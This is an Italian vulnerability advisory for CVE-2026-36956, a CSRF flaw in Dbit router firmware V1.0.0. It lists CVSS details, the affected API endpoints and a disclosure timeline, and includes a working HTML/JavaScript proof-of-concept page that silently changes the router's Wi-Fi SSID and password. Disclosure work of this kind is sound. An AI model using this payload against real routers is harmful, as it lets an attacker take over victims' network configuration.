
Proof-of-concept per CVE-2026-36956, una vulnerabilità CSRF nel firmware del router Dbit che consente modifiche non autorizzate alla configurazione tramite richieste contraffatte.
ID CVE: CVE-2026-36956 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: Shenzhen Dibit Network Equipment Co., Ltd. Prodotto: Router Dbit Versione Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Il firmware V1.0.0 del router Dbit non implementa meccanismi di protezione CSRF come token anti-CSRF o una rigorosa validazione degli header Origin/Referer sugli endpoint API amministrativi. Un attaccante può creare una pagina web dannosa che invia richieste HTTP contraffatte agli endpoint di configurazione. Se un amministratore autenticato visita la pagina dannosa, il router elabora la richiesta contraffatta come un'azione amministrativa legittima.
Punteggio CVSS v3.1: 8.8 (Alto)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Metrica | Valore |
|---|---|
| Vettore di attacco | Rete |
| Complessità dell'attacco | Bassa |
| Privilegi richiesti | Nessuno |
| Interazione utente | Richiesta |
| Impatto sulla riservatezza | Alto |
| Impatto sull'integrità | Alto |
| Impatto sulla disponibilità | Alto |
| Endpoint | Funzione |
|---|---|
/api/setWlan | Configurazione della rete wireless (SSID, password) |
/api/setWan | Configurazione WAN |
/api/setSystem | Configurazione di sistema |
Salvare il seguente codice come poc.html e aprirlo mentre un amministratore è connesso al router:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportamento atteso: La richiesta dovrebbe essere rifiutata a causa della mancata corrispondenza del token CSRF. Comportamento effettivo: Il router accetta ed elabora la richiesta contraffatta.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilità scoperta |
| 2026-04-29 | Segnalata a MITRE |
| 2026-04-29 | Assegnato CVE-2026-36956 |
| 2026-04-29 | Divulgazione pubblica |